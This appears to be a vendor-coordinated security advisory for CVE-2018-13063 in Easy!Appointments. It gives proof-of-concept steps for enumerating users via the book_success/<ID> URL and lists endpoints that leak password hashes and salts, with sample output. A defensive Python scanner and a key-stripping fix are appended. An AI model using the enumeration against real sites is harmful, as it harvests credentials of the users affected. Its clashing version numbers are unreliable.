[CVE-2018-13063] Easy!Appointments – Multiple confidential information leakage
Easy!Appointments is a highly customizable web application that offers scheduling management for businesses. We found multiple leaks of confidential user information.
Description
Easy!Appointments is a highly customizable web application that offers scheduling management for businesses.
Threat
Without being authenticated, an attacker can collect users’ information, including hashed passwords and salts.
Expectation
The application should only send strictly necessary information. It should never send hashed passwords.
Vulnerability Type
CVE ID: CVE-2018-13063
Access Vector: network
Security Risk: high
Vulnerability: CWE-200
CVSS Base Score: 7.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Details
The Easy!Appointments application has multiple interfaces which leak users’ information, including hashed passwords and salts.
Proof of Concept 1 : Unauthenticated providers’ information leak
Without being authenticated, it is possible to collect provider data.
Steps :
1/ Visit the application (e.g. visit localhost)
2/ Select a service and a provider
3/ Choose an appointment date and time
4/ Fill required information
5/ Search the source code of the page « Your appointment has been successfully registered! » for GlobalVariables:
var GlobalVariables = {
[...]
'providerData': {
"id": "85",
"first_name": "John",
"last_name": "Doe",
"email": "john@doe.com",
"mobile_number": "",
"phone_number": "0123456789",
"address": "",
"city": "",
"state": "",
[...]
"settings": {
"username": "johndoe",
"password": "b7bfe806d58fe09deabfe686a65b49b8a012dbf210033f1acb284ad75a6ba6b6",
"salt": "5c67f8e9b16f391a2d94606c9a1c3e8e8be47a47c7292dbe78ba4a75e60871e6",
[...]
"google_sync": "0",
"google_token": "",
"google_calendar": "",
"sync_past_days": "5",
"sync_future_days": "5",
"calendar_view": "default"
}
},
6/ The book_success page can be enumerated to obtain other users’ data. You just need to pass the user ID like in: index.php/appointments/book_success/<ID>. For instance: http://localhost/index.php/appointments/book_success/63.
Proof of Concept 2 : Information leakage in the admin interface
In the admin interface, at the user tab, the API leaks hashed passwords and salts.
- User tab, at index.php/backend/users (output truncated for the sake of brevity):
var GlobalVariables = {
csrfToken: "7349322823ef8b3ed03a2bcdb17b6001",
baseUrl: "http:\/\/localhost",
dateFormat: "DMY",
admins: [{
"id": "84",
"first_name": "admin",
"last_name": "admin",
"email": "admin@admin.admin",
"mobile_number": "",
"phone_number": "adminn",
"address": "",
"city": "",
"state": "",
"zip_code": "",
"notes": "",
"id_roles": "1",
"settings": {
"username": "admin",
"password": "5c3716a135b95d6f07d6549a7842386915ee14fd9a003c287f74c5588b7f1fea",
"salt": "0b12403b95c62f4aaa75ddaa6f5dcb8e54e3e6fe7b504ca97fd676ddfa70ecae",
"working_plan": "",
"notifications": "0",
"google_sync": "0",
"google_token": "",
"google_calendar": "",
"sync_past_days": "5",
"sync_future_days": "5",
"calendar_view": "default"
}
},
[...]
providers: [{
"id": "85",
"first_name": "John",
"last_name": "Doe",
"email": "john@doe.com",
"mobile_number": "",
"phone_number": "0123456789",
"address": "",
"city": "",
"state": "",
"zip_code": "",
"notes": "",
"id_roles": "2",
"services": ["13"],
"settings": {
"username": "johndoe",
"password": "b7bfe806d58fe09deabfe686a65b49b8a012dbf210033f1acb284ad75a6ba6b6",
"salt": "5c67f8e9b16f391a2d94606c9a1c3e8e8be47a47c7292dbe78ba4a75e60871e6",
[...]
};
- index.php/backend_api/ajax_filter_admins (Users > Admins): dumps admin information including password hashes and salts.
- index.php/backend_api/ajax_filter_providers (Users > Providers): dumps provider information including password hashes and salts.
- index.php/backend_api/ajax_filter_secretaries (Users > Secretaries): dumps secretary information including password hashes and salts.
Proof of Concept 3 : Information leakage in other interfaces
- http://localhost/index.php/backend/settings: leaks the password hash and salt of the currently logged-in user.
- http://localhost/index.php/backend_api/ajax_get_calendar_appointments: leaks the password hash and salt of « John Doe » (default user).
- http://localhost/index.php/backend_api/ajax_filter_customers: leaks the password hash and salt of « John Doe » (default user).
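As an added example (not part of the advisory or of the Easy!Appointments code base), the following Python script shows the two checks a maintainer would want for the leaks listed above: a scanner that flags password and salt keys (and, as an assumption, google_token) inside a page's GlobalVariables block, and the shape of the server-side fix, stripping those keys from user records before they are serialized into the view. The sample provider record and its hash/salt values are constructed placeholders.

```python
import json
import re

# Keys that must never be embedded in a client-side GlobalVariables block.
# 'password' and 'salt' are the fields shown leaking in the advisory;
# 'google_token' is added as an assumption (an OAuth token is just as sensitive).
SENSITIVE_KEYS = ("password", "salt", "google_token")

# Matches a sensitive key at any nesting level of a JS object literal, whether
# quoted ("password":) or bare (password:), as both forms appear in the output.
_KEY_RE = re.compile(r"""["']?\b(%s)\b["']?\s*:""" % "|".join(SENSITIVE_KEYS))
_BLOCK_RE = re.compile(r"var\s+GlobalVariables\s*=\s*(\{.*?\})\s*;", re.S)


def leaked_keys(page_source):
    """Return the set of sensitive key names found inside the page's
    `var GlobalVariables = {...};` block; an empty set means the page is clean."""
    m = _BLOCK_RE.search(page_source)
    return set(_KEY_RE.findall(m.group(1))) if m else set()


def strip_sensitive(value):
    """Server-side fix shape: deep-copy a user record (or a list of records)
    with every SENSITIVE_KEYS entry removed, including under 'settings'."""
    if isinstance(value, dict):
        return {k: strip_sensitive(v) for k, v in value.items() if k not in SENSITIVE_KEYS}
    if isinstance(value, list):
        return [strip_sensitive(v) for v in value]
    return value


# Constructed sample shaped like the book_success output in the advisory;
# the hash and salt are placeholders, not values from the report.
PROVIDER = {"id": "85", "first_name": "John", "last_name": "Doe",
            "settings": {"username": "johndoe", "password": "<hash placeholder>",
                         "salt": "<salt placeholder>", "calendar_view": "default"}}


def render_page(provider):
    """Mimic a view that embeds providerData into GlobalVariables (hypothetical)."""
    return ("<script>var GlobalVariables = "
            + json.dumps({"providerData": provider}) + ";</script>")


if __name__ == "__main__":
    print(leaked_keys(render_page(PROVIDER)))                   # {'password', 'salt'}
    print(leaked_keys(render_page(strip_sensitive(PROVIDER))))  # set()
```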
Affected versions
Versions 1.3.0 and prior to 1.2.1 – other versions have not been tested.
Solution
Update to a version later than 1.3.2.
Timeline (dd/mm/yyyy)
- 06/03/2018 : Initial discovery
- 17/04/2018 : Vendor contact
- 17/05/2018 : Vendor technical team acknowledgment
- 15/08/2018 : Vendor submits a private 2.2.16.128 pre-release that, according to our test, did not mitigate the issue.
- 25/10/2019 : Public disclosure
Credits
- Pierrick VERAN, Sysdream (p.veran -at- sysdream -dot- com)